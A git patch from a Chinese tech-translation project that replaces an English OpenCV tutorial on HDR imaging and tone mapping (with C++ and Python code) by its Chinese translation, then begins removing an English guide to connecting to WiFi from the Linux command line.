-float saturation = 1.0f,
-float bias = 0.85f
-)
-```
-
-Here, bias is the value for bias function in [0, 1] range. Values from 0.7 to 0.9 usually give the best results. The default value is 0.85\. For more technical details, please see this [paper][17].
-
-The C++ and Python code are shown below. The parameters were obtained by trial and error. The final output is multiplied by 3 just because it gave the most pleasing results.
-
-C++
-
-```
-// Tonemap using Drago's method to obtain 24-bit color image
-Mat ldrDrago;
-Ptr tonemapDrago = createTonemapDrago(1.0, 0.7);
-tonemapDrago->process(hdrDebevec, ldrDrago);
-ldrDrago = 3 * ldrDrago;
-imwrite("ldr-Drago.jpg", ldrDrago * 255);
-```
-
-Python
-
-```
-# Tonemap using Drago's method to obtain 24-bit color image
-tonemapDrago = cv2.createTonemapDrago(1.0, 0.7)
-ldrDrago = tonemapDrago.process(hdrDebevec)
-ldrDrago = 3 * ldrDrago
-cv2.imwrite("ldr-Drago.jpg", ldrDrago * 255)
-```
-
-Result
-
- [![HDR tone mapping using Drago's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago-1024x770.jpg)][18] HDR tone mapping using Drago’s algorithm
-
-#### Durand Tonemap
-
-The parameters for Durand Tonemap are shown below.
-
-```
-createTonemapDurand
-(
- float gamma = 1.0f,
- float contrast = 4.0f,
- float saturation = 1.0f,
- float sigma_space = 2.0f,
- float sigma_color = 2.0f
-);
-```
-The algorithm is based on the decomposition of the image into a base layer and a detail layer. The base layer is obtained using an edge-preserving filter called the bilateral filter. sigma_space and sigma_color are the parameters of the bilateral filter that control the amount of smoothing in the spatial and color domains respectively.
-
-For more details, check out this [paper][19].
-
-C++
-
-```
-// Tonemap using Durand's method obtain 24-bit color image
-Mat ldrDurand;
-Ptr tonemapDurand = createTonemapDurand(1.5,4,1.0,1,1);
-tonemapDurand->process(hdrDebevec, ldrDurand);
-ldrDurand = 3 * ldrDurand;
-imwrite("ldr-Durand.jpg", ldrDurand * 255);
-```
-Python
-
-```
-# Tonemap using Durand's method obtain 24-bit color image
- tonemapDurand = cv2.createTonemapDurand(1.5,4,1.0,1,1)
- ldrDurand = tonemapDurand.process(hdrDebevec)
- ldrDurand = 3 * ldrDurand
- cv2.imwrite("ldr-Durand.jpg", ldrDurand * 255)
-```
-
-Result
-
- [![HDR tone mapping using Durand's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand-1024x770.jpg)][20] HDR tone mapping using Durand’s algorithm
-
-#### Reinhard Tonemap
-
-```
-
-createTonemapReinhard
-(
-float gamma = 1.0f,
-float intensity = 0.0f,
-float light_adapt = 1.0f,
-float color_adapt = 0.0f
-)
-```
-
-The parameter intensity should be in the [-8, 8] range. Greater intensity value produces brighter results. light_adapt controls the light adaptation and is in the [0, 1] range. A value of 1 indicates adaptation based only on pixel value and a value of 0 indicates global adaptation. An in-between value can be used for a weighted combination of the two. The parameter color_adapt controls chromatic adaptation and is in the [0, 1] range. The channels are treated independently if the value is set to 1 and the adaptation level is the same for every channel if the value is set to 0\. An in-between value can be used for a weighted combination of the two.
-
-For more details, check out this [paper][21].
-
-C++
-
-```
-// Tonemap using Reinhard's method to obtain 24-bit color image
-Mat ldrReinhard;
-Ptr tonemapReinhard = createTonemapReinhard(1.5, 0,0,0);
-tonemapReinhard->process(hdrDebevec, ldrReinhard);
-imwrite("ldr-Reinhard.jpg", ldrReinhard * 255);
-```
-
-Python
-
-```
-# Tonemap using Reinhard's method to obtain 24-bit color image
-tonemapReinhard = cv2.createTonemapReinhard(1.5, 0,0,0)
-ldrReinhard = tonemapReinhard.process(hdrDebevec)
-cv2.imwrite("ldr-Reinhard.jpg", ldrReinhard * 255)
-```
-
-Result
-
- [![HDR tone mapping using Reinhard's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard-1024x770.jpg)][22] HDR tone mapping using Reinhard’s algorithm
-
-#### Mantiuk Tonemap
-
-```
-createTonemapMantiuk
-(
-float gamma = 1.0f,
-float scale = 0.7f,
-float saturation = 1.0f
-)
-```
-
-The parameter scale is the contrast scale factor. Values from 0.6 to 0.9 produce best results.
-
-For more details, check out this [paper][23]
-
-C++
-
-```
-// Tonemap using Mantiuk's method to obtain 24-bit color image
-Mat ldrMantiuk;
-Ptr tonemapMantiuk = createTonemapMantiuk(2.2,0.85, 1.2);
-tonemapMantiuk->process(hdrDebevec, ldrMantiuk);
-ldrMantiuk = 3 * ldrMantiuk;
-imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255);
-```
-
-Python
-
-```
-# Tonemap using Mantiuk's method to obtain 24-bit color image
-tonemapMantiuk = cv2.createTonemapMantiuk(2.2,0.85, 1.2)
-ldrMantiuk = tonemapMantiuk.process(hdrDebevec)
-ldrMantiuk = 3 * ldrMantiuk
-cv2.imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255)
-```
-
-Result
-
- [![HDR tone mapping using Mantiuk's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk-1024x770.jpg)][24] HDR Tone mapping using Mantiuk’s algorithm
-
-### Subscribe & Download Code
-
-If you liked this article and would like to download code (C++ and Python) and example images used in this post, please [subscribe][25] to our newsletter. You will also receive a free [Computer Vision Resource][26]Guide. In our newsletter, we share OpenCV tutorials and examples written in C++/Python, and Computer Vision and Machine Learning algorithms and news.
-
-[Subscribe Now][27]
-
-Image Credits
-The four exposure images used in this post are licensed under [CC BY-SA 3.0][28] and were downloaded from [Wikipedia’s HDR page][29]. They were photographed by Kevin McCoy.
-
---------------------------------------------------------------------------------
-
-作者简介:
-
-I am an entrepreneur with a love for Computer Vision and Machine Learning with a dozen years of experience (and a Ph.D.) in the field.
-
-In 2007, right after finishing my Ph.D., I co-founded TAAZ Inc. with my advisor Dr. David Kriegman and Kevin Barnes. The scalability, and robustness of our computer vision and machine learning algorithms have been put to rigorous test by more than 100M users who have tried our products.
-
----------------------------
-
-via: http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/
-
-作者:[ SATYA MALLICK ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.learnopencv.com/about/
-[1]:http://www.learnopencv.com/author/spmallick/
-[2]:http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/#disqus_thread
-[3]:http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg
-[4]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
-[5]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
-[6]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[7]:https://itunes.apple.com/us/app/autobracket-hdr/id923626339?mt=8&ign-mpt=uo%3D8
-[8]:https://play.google.com/store/apps/details?id=com.almalence.opencam&hl=en
-[9]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg
-[10]:https://www.howtogeek.com/289712/how-to-see-an-images-exif-data-in-windows-and-macos
-[11]:https://www.sno.phy.queensu.ca/~phil/exiftool
-[12]:http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg
-[13]:https://www.slrlounge.com/workshop/using-mirror-up-mode-mirror-lockup
-[14]:http://www.pauldebevec.com/Research/HDR/debevec-siggraph97.pdf
-[15]:http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg
-[16]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping.jpg
-[17]:http://resources.mpi-inf.mpg.de/tmo/logmap/logmap.pdf
-[18]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago.jpg
-[19]:https://people.csail.mit.edu/fredo/PUBLI/Siggraph2002/DurandBilateral.pdf
-[20]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand.jpg
-[21]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.106.8100&rep=rep1&type=pdf
-[22]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard.jpg
-[23]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.60.4077&rep=rep1&type=pdf
-[24]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk.jpg
-[25]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[26]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[27]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
-[28]:https://creativecommons.org/licenses/by-sa/3.0/
-[29]:https://en.wikipedia.org/wiki/High-dynamic-range_imaging
diff --git a/translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md b/translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
new file mode 100644
index 0000000000..400f4baa80
--- /dev/null
+++ b/translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
@@ -0,0 +1,416 @@
+使用OpenCV(C ++ / Python)进行高动态范围(HDR)成像
+============================================================
+
+在本教程中,我们将学习如何使用由不同曝光设置拍摄的多张图像创建高动态范围(HDR)图像。 我们将以C ++和Python两种形式分享代码。
+
+### 什么是高动态范围成像?
+
+大多数数码相机和显示器都是按照24位矩阵捕获或者显示彩色图像。 每个颜色通道有8位,因此每个通道的像素值在0-255范围内。 换句话说,普通的相机或者显示器的动态范围是有限的。
+
+但是,我们周围世界动态范围极大。 在车库内关灯就会变黑,直接看着太阳就会变得非常亮。 即使不考虑这些极端,在日常情况下,8位的通道勉强可以捕捉到现场场景。 因此,相机会尝试去评估光照并且自动设置曝光,这样图像的感兴趣区就会有良好的动态范围,并且太暗和太亮的部分会被截取,取值为0和255。
+
+在下图中,左侧的图像是正常曝光的图像。 请注意,由于相机决定使用拍摄主体(我的儿子)的设置,所以背景中的天空已经完全流失了,但是明亮的天空也因此被刷掉了。 右侧的图像是由iPhone生成的HDR图像。
+
+ [![High Dynamic Range (HDR)](http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg)][3]
+
+iPhone是如何拍摄HDR图像的呢? 它实际上采用三种不同的曝光度拍摄了3张图像,3张图像拍摄非常迅速,在3张图像之间几乎没有产生位移。然后组合三幅图像来产生HDR图像。 我们将在下一节看到一些细节。
+
+将在不同曝光设置下获取的相同场景的不同图像组合的过程称为高动态范围(HDR)成像。
+
+### 高动态范围(HDR)成像是如何工作的?
+
+在本节中,我们来看下使用OpenCV创建HDR图像的步骤。
+
+要想轻松学习本教程,请点击[此处][5][下载][4]C ++和Python代码还有图像。 如果您有兴趣了解更多关于人工智能,计算机视觉和机器学习的信息,请[订阅][6]我们的电子杂志。
+
+### 第1步:捕获不同曝光度的多张图像
+
+当我们使用相机拍照时,每个通道只有8位来表示场景的动态范围(亮度范围)。 但是,通过改变快门速度,我们可以在不同的曝光条件下拍摄多个场景图像。 大多数单反相机SLR有一个功能称为自动包围式曝光(AEB),只需按一下按钮,我们就可以在不同的曝光下拍摄多张照片。 如果你正在使用iPhone,你可以使用这个[自动包围式HDR应用程序][7],如果你是一个Android用户,你可以尝试一个[更好的相机应用程序][8]。
+
+场景没有变化时,在相机上使用自动包围式曝光或在手机上使用自动包围式应用程序,我们可以一张接一张地快速拍摄多张照片。 当我们在iPhone中使用HDR模式时,会拍摄三张照片。
+
+1. 曝光不足的图像:该图像比正确曝光的图像更暗。 目标是捕捉非常明亮的图像部分。
+2. 正确曝光的图像:这是相机将根据其估计的照明拍摄的常规图像。
+3. 曝光过度的图像:该图像比正确曝光的图像更亮。 目标是拍摄非常黑暗的图像部分。
+
+但是,如果场景的动态范围很大,我们可以拍摄三张以上的图片来合成HDR图像。 在本教程中,我们将使用曝光时间为1/30秒,0.25秒,2.5秒和15秒的4张图像。 缩略图如下所示。
+
+ [![Auto Exposure Bracketed HDR image sequence](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg)][9]
+
+单反相机或手机的曝光时间和其他设置的信息通常存储在JPEG文件的EXIF元数据中。 查看此[链接][10]可查看Windows和Mac中存储在JPEG文件中的EXIF元数据。 或者,您可以使用我最喜欢的名为[EXIFTOOL][11]的查看EXIF的命令行工具。
+
+我们先从读取分配到不同曝光时间的图像开始
+
+C++
+
+```
+void readImagesAndTimes(vector &images, vector ×)
+{
+
+ int numImages = 4;
+
+ // 曝光时间列表
+ static const float timesArray[] = {1/30.0f,0.25,2.5,15.0};
+ times.assign(timesArray, timesArray + numImages);
+
+ // 图像文件名称列表
+ static const char* filenames[] = {"img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"};
+ for(int i=0; i < numImages; i++)
+ {
+ Mat im = imread(filenames[i]);
+ images.push_back(im);
+ }
+
+}
+```
+
+Python
+
+```
+def readImagesAndTimes():
+ # 曝光时间列表
+ times = np.array([ 1/30.0, 0.25, 2.5, 15.0 ], dtype=np.float32)
+
+ # 图像文件名称列表
+ filenames = ["img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"]
+ images = []
+ for filename in filenames:
+ im = cv2.imread(filename)
+ images.append(im)
+
+ return images, times
+```
+
+### 第2步:对齐图像
+
+合成HDR图像时使用的图像如果未对齐可能会导致严重的伪影。 在下图中,左侧的图像是使用未对齐的图像组成的HDR图像,右侧的图像是使用对齐的图像的图像。 通过放大图像的一部分,使用红色圆圈显示的,,我们会在左侧图像中看到严重的鬼影。
+
+ [![Misalignment problem in HDR](http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg)][12]
+
+在拍摄照片制作HDR图像时,专业摄影师自然是将相机安装在三脚架上。 他们还使用称为[镜像锁定][13]功能来减少额外的振动。 即使如此,图像可能仍然没有完美对齐,因为没有办法保证无振动的环境。 使用手持相机或手机拍摄图像时,对齐问题会变得更糟。
+
+幸运的是,OpenCV提供了一种简单的方法,使用`AlignMTB`对齐这些图像。 该算法将所有图像转换为中值阈值位图(MTB)。 图像的MTB生成方式为将比中值亮度的更亮的分配为1,其余为0。 MTB不随曝光时间的改变而改变。 因此不需要我们指定曝光时间就可以对齐MTB。
+
+基于MTB的对齐方式的代码如下。
+
+C++
+
+```
+// 对齐输入图像
+Ptr alignMTB = createAlignMTB();
+alignMTB->process(images, images);
+```
+
+Python
+
+```
+# 对齐输入图像
+alignMTB = cv2.createAlignMTB()
+alignMTB.process(images, images)
+```
+
+### 第3步:提取相机响应函数
+
+典型相机的响应与场景亮度不成线性关系。 那是什么意思呢? 假设有两个物体由同一个相机拍摄,在现实世界中其中一个物体是另一个物体亮度的两倍。 当您测量照片中两个物体的像素亮度时,较亮物体的像素值将不会是较暗物体的两倍。 在不估计相机响应函数(CRF)的情况下,我们将无法将图像合并到一个HDR图像中。
+
+将多个曝光图像合并为HDR图像意味着什么?
+
+只考虑图像的某个位置(x,y)一个像素。 如果CRF是线性的,则像素值将直接与曝光时间成比例,除非像素在特定图像中太暗(即接近0)或太亮(即接近255)。 我们可以过滤出这些不好的像素(太暗或太亮),并且将像素值除以曝光时间来估计像素的亮度,然后在像素不差的(太暗或太亮)所有图像上对亮度值取平均。我们可以对所有像素进行这样的处理,并通过对“好”像素进行平均来获得所有像素的单张图像。
+
+但是CRF不是线性的, 我们需要评估CRF把图像强度变成线性,然后才能合并或者平均它们。
+
+好消息是,如果我们知道每个图像的曝光时间,则可以从图像估计CRF。 与计算机视觉中的许多问题一样,找到CRF的问题本质是一个最优解问题,其目标是使由数据项和平滑项组成的目标函数最小化。 这些问题通常会降维到线性最小二乘问题,这些问题可以使用奇异值分解(SVD)来解决,奇异值分解是所有线性代数包的一部分。 CRF提取算法的细节在[从照片提取高动态范围辐射图][14]这篇论文中可以找到。
+
+使用OpenCv的`CalibrateDebevec` 或者`CalibrateRobertson`就可以用2行代码找到CRF。本篇教程中我们使用 `CalibrateDebevec`
+
+C++
+
+```
+// 获取图像响应函数 (CRF)
+Mat responseDebevec;
+Ptr calibrateDebevec = createCalibrateDebevec();
+calibrateDebevec->process(images, responseDebevec, times);
+
+```
+
+Python
+
+```
+# 获取图像响应函数 (CRF)
+calibrateDebevec = cv2.createCalibrateDebevec()
+responseDebevec = calibrateDebevec.process(images, times)
+```
+
+下图显示了使用红绿蓝通道的图像提取的CRF。
+
+ [![Camera Response Function](http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg)][15]
+
+### 第4步:合并图像
+
+一旦CRF评估结束,我们可以使用`MergeDebevec`将曝光图像合并成一个HDR图像。 C ++和Python代码如下所示。
+
+C++
+
+```
+// 将图像合并为HDR线性图像
+Mat hdrDebevec;
+Ptr mergeDebevec = createMergeDebevec();
+mergeDebevec->process(images, hdrDebevec, times, responseDebevec);
+// 保存图像
+imwrite("hdrDebevec.hdr", hdrDebevec);
+```
+
+Python
+
+```
+# 将图像合并为HDR线性图像
+mergeDebevec = cv2.createMergeDebevec()
+hdrDebevec = mergeDebevec.process(images, times, responseDebevec)
+# 保存图像
+cv2.imwrite("hdrDebevec.hdr", hdrDebevec)
+```
+
+上面保存的HDR图像可以在Photoshop中加载并进行色调映射。示例图像如下所示。
+
+ [![HDR Photoshop tone mapping](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping-1024x770.jpg)][16] HDR Photoshop 色调映射
+
+### 第5步:色调映射
+
+现在我们已经将我们的曝光图像合并到一个HDR图像中。 你能猜出这个图像的最小和最大像素值吗? 对于黑色条件,最小值显然为0。 理论最大值是什么? 无限大! 在实践中,不同情况下的最大值是不同的。 如果场景包含非常明亮的光源,那么最大值就会非常大。
+
+尽管我们已经使用多个图像恢复了相对亮度信息,但是我们现在又面临了新的挑战:将这些信息保存为24位图像用于显示。
+
+将高动态范围(HDR)图像转换为8位单通道图像的过程称为色调映射。这个过程的同时还需要保留尽可能多的细节。
+
+有几种色调映射算法。 OpenCV实现了其中的四个。 要记住的是没有一个绝对正确的方法来做色调映射。 通常,我们希望在色调映射图像中看到比任何一个曝光图像更多的细节。 有时色调映射的目标是产生逼真的图像,而且往往是产生超现实图像的目标。 在OpenCV中实现的算法倾向于产生现实的并不那么生动的结果。
+
+我们来看看各种选项。 以下列出了不同色调映射算法的一些常见参数。
+
+1. 伽马gamma:该参数通过应用伽马gamma校正来压缩动态范围。 当gamma等于1时,不应用修正。 小于1的伽玛会使图像变暗,而大于1的伽马会使图像变亮。
+2. 饱和度saturation:该参数用于增加或减少饱和度。 饱和度高时,色彩更丰富,更浓。 饱和度值接近零,使颜色逐渐消失为灰度。
+3. 对比度contrast:控制输出图像的对比度(即log (maxPixelValue/minPixelValue))。
+
+让我们来探索OpenCV中可用的四种色调映射算法。
+
+#### Drago 色调映射
+
+Drago 色调映射的参数如下所示
+
+```
+createTonemapDrago
+(
+float gamma = 1.0f,
+float saturation = 1.0f,
+float bias = 0.85f
+)
+```
+
+这里,bias是[0,1]范围内偏差函数的值。 从0.7到0.9的值通常效果较好。 默认值是0.85。 有关更多技术细节,请参阅这篇[论文][17]。
+
+C ++和Python代码如下所示。 参数是通过反复试验获得的。 最后的结果乘以3只是因为它给出了最令人满意的结果。
+
+C++
+
+```
+// 使用Drago色调映射算法获得24位彩色图像
+Mat ldrDrago;
+Ptr tonemapDrago = createTonemapDrago(1.0, 0.7);
+tonemapDrago->process(hdrDebevec, ldrDrago);
+ldrDrago = 3 * ldrDrago;
+imwrite("ldr-Drago.jpg", ldrDrago * 255);
+```
+
+Python
+
+```
+# 使用Drago色调映射算法获得24位彩色图像
+tonemapDrago = cv2.createTonemapDrago(1.0, 0.7)
+ldrDrago = tonemapDrago.process(hdrDebevec)
+ldrDrago = 3 * ldrDrago
+cv2.imwrite("ldr-Drago.jpg", ldrDrago * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Drago's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago-1024x770.jpg)][18] 使用Drago算法的HDR色调映射
+
+#### Durand 色调映射
+
+Durand 色调映射的参数如下所示
+
+```
+createTonemapDurand
+(
+ float gamma = 1.0f,
+ float contrast = 4.0f,
+ float saturation = 1.0f,
+ float sigma_space = 2.0f,
+ float sigma_color = 2.0f
+);
+```
+该算法基于将图像分解为基础层和细节层。 使用称为双边滤波器的边缘保留滤波器来获得基本层。 sigma_space和sigma_color是双边滤波器的参数,分别控制空间域和彩色域中的平滑量。
+
+有关更多详细信息,请查看这篇[论文][19]。
+
+C++
+
+```
+// 使用Durand色调映射算法获得24位彩色图像
+Mat ldrDurand;
+Ptr tonemapDurand = createTonemapDurand(1.5,4,1.0,1,1);
+tonemapDurand->process(hdrDebevec, ldrDurand);
+ldrDurand = 3 * ldrDurand;
+imwrite("ldr-Durand.jpg", ldrDurand * 255);
+```
+Python
+
+```
+# 使用Durand色调映射算法获得24位彩色图像
+ tonemapDurand = cv2.createTonemapDurand(1.5,4,1.0,1,1)
+ ldrDurand = tonemapDurand.process(hdrDebevec)
+ ldrDurand = 3 * ldrDurand
+ cv2.imwrite("ldr-Durand.jpg", ldrDurand * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Durand's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand-1024x770.jpg)][20] 使用Durand算法的HDR色调映射
+
+#### Reinhard 色调映射
+
+```
+
+createTonemapReinhard
+(
+float gamma = 1.0f,
+float intensity = 0.0f,
+float light_adapt = 1.0f,
+float color_adapt = 0.0f
+)
+```
+
+intensity 参数应在[-8, 8]范围内。 更高的亮度值会产生更明亮的结果。 light_adapt控制灯光,范围为[0, 1]。 值1表示仅基于像素值的自适应,而值0表示全局自适应。 中间值可以用于两者的加权组合。 参数color_adapt控制色彩,范围为[0, 1]。 如果值被设置为1,则通道被独立处理,如果该值被设置为0,则每个通道的适应级别相同。中间值可以用于两者的加权组合。
+
+有关更多详细信息,请查看这篇[论文][21]。
+
+C++
+
+```
+// 使用Reinhard色调映射算法获得24位彩色图像
+Mat ldrReinhard;
+Ptr tonemapReinhard = createTonemapReinhard(1.5, 0,0,0);
+tonemapReinhard->process(hdrDebevec, ldrReinhard);
+imwrite("ldr-Reinhard.jpg", ldrReinhard * 255);
+```
+
+Python
+
+```
+# 使用Reinhard色调映射算法获得24位彩色图像
+tonemapReinhard = cv2.createTonemapReinhard(1.5, 0,0,0)
+ldrReinhard = tonemapReinhard.process(hdrDebevec)
+cv2.imwrite("ldr-Reinhard.jpg", ldrReinhard * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Reinhard's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard-1024x770.jpg)][22] 使用Reinhard算法的HDR色调映射
+
+#### Mantiuk 色调映射
+
+```
+createTonemapMantiuk
+(
+float gamma = 1.0f,
+float scale = 0.7f,
+float saturation = 1.0f
+)
+```
+
+参数scale是对比度比例因子。 从0.7到0.9的值通常效果较好
+
+有关更多详细信息,请查看这篇[论文][23]。
+
+C++
+
+```
+// 使用Mantiuk色调映射算法获得24位彩色图像
+Mat ldrMantiuk;
+Ptr tonemapMantiuk = createTonemapMantiuk(2.2,0.85, 1.2);
+tonemapMantiuk->process(hdrDebevec, ldrMantiuk);
+ldrMantiuk = 3 * ldrMantiuk;
+imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255);
+```
+
+Python
+
+```
+# 使用Mantiuk色调映射算法获得24位彩色图像
+tonemapMantiuk = cv2.createTonemapMantiuk(2.2,0.85, 1.2)
+ldrMantiuk = tonemapMantiuk.process(hdrDebevec)
+ldrMantiuk = 3 * ldrMantiuk
+cv2.imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Mantiuk's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk-1024x770.jpg)][24] 使用Mantiuk算法的HDR色调映射
+
+### 订阅然后下载代码
+
+如果你喜欢这篇文章,并希望下载本文中使用的代码(C ++和Python)和示例图片,请[订阅][25]我们的电子杂志。 您还将获得免费的[计算机视觉资源][26]指南。 在我们的电子杂志中,我们分享了用C ++还有Python编写的OpenCV教程和例子,以及计算机视觉和机器学习的算法和新闻。
+
+[点此订阅][27]
+
+图像学分
+
+本文中使用的四个曝光图像获得[CC BY-SA 3.0][28]许可,并从[维基百科的HDR页面][29]下载。 图像由Kevin McCoy拍摄。
+
+--------------------------------------------------------------------------------
+
+作者简介:
+
+我是一位热爱计算机视觉和机器学习的企业家,拥有十多年的实践经验(还有博士学位)。
+
+2007年,在完成博士学位之后,我和我的顾问David Kriegman博士还有Kevin Barnes共同创办了TAAZ公司.。 我们的计算机视觉和机器学习算法的可扩展性和鲁棒性已经经过了试用了我们产品的超过1亿的用户的严格测试。
+
+---------------------------
+
+via: http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/
+
+作者:[SATYA MALLICK ][a]
+译者:[Flowsnow](https://github.com/Flowsnow)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.learnopencv.com/about/
+[1]:http://www.learnopencv.com/author/spmallick/
+[2]:http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/#disqus_thread
+[3]:http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg
+[4]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
+[5]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
+[6]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[7]:https://itunes.apple.com/us/app/autobracket-hdr/id923626339?mt=8&ign-mpt=uo%3D8
+[8]:https://play.google.com/store/apps/details?id=com.almalence.opencam&hl=en
+[9]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg
+[10]:https://www.howtogeek.com/289712/how-to-see-an-images-exif-data-in-windows-and-macos
+[11]:https://www.sno.phy.queensu.ca/~phil/exiftool
+[12]:http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg
+[13]:https://www.slrlounge.com/workshop/using-mirror-up-mode-mirror-lockup
+[14]:http://www.pauldebevec.com/Research/HDR/debevec-siggraph97.pdf
+[15]:http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg
+[16]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping.jpg
+[17]:http://resources.mpi-inf.mpg.de/tmo/logmap/logmap.pdf
+[18]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago.jpg
+[19]:https://people.csail.mit.edu/fredo/PUBLI/Siggraph2002/DurandBilateral.pdf
+[20]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand.jpg
+[21]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.106.8100&rep=rep1&type=pdf
+[22]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard.jpg
+[23]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.60.4077&rep=rep1&type=pdf
+[24]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk.jpg
+[25]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[26]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[27]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[28]:https://creativecommons.org/licenses/by-sa/3.0/
+[29]:https://en.wikipedia.org/wiki/High-dynamic-range_imaging
From 8237dcca7f48be180605515bed6d0d16f4edc702 Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 21:41:32 +0800
Subject: [PATCH 221/371] translate done: 20171002 Connect To Wifi From The
Linux Command Line.md
---
...ect To Wifi From The Linux Command Line.md | 119 ------------------
...ect To Wifi From The Linux Command Line.md | 109 ++++++++++++++++
2 files changed, 109 insertions(+), 119 deletions(-)
delete mode 100644 sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
create mode 100644 translated/tech/20171002 Connect To Wifi From The Linux Command Line.md
diff --git a/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md b/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
deleted file mode 100644
index de47cf50a8..0000000000
--- a/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
+++ /dev/null
@@ -1,119 +0,0 @@
-translating by lujun9972
-Connect To Wifi From The Linux Command Line
-======
-
-### Objective
-
-Configure WiFi using only command line utilities.
-
-### Distributions
-
-This will work on any major Linux distribution.
-
-### Requirements
-
-A working Linux install with root privileges and a compatible wireless network adapter.
-
-### Difficulty
-
-Easy
-
-### Conventions
-
- * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
- * **$** \- given command to be executed as a regular non-privileged user
-
-
-
-### Introduction
-
-Lots of people like graphical utilities for managing their computers, but plenty don't too. If you prefer command line utilities, managing WiFi can be a real pain. Well, it doesn't have to be.
-
-wpa_supplicant can be used as a command line utility. You can actually set it up easily with a simple configuration file.
-
-### Scan For Your Network
-
-If you already know your network information, you can skip this step. If not, its a good way to figure out some info about the network you're connecting to.
-
-wpa_supplicant comes with a tool called `wpa_cli` which provides a command line interface to manage your WiFi connections. You can actually use it to set up everything, but setting up a configuration file seems a bit easier.
-
-Run `wpa_cli` with root privileges, then scan for networks.
-```
-
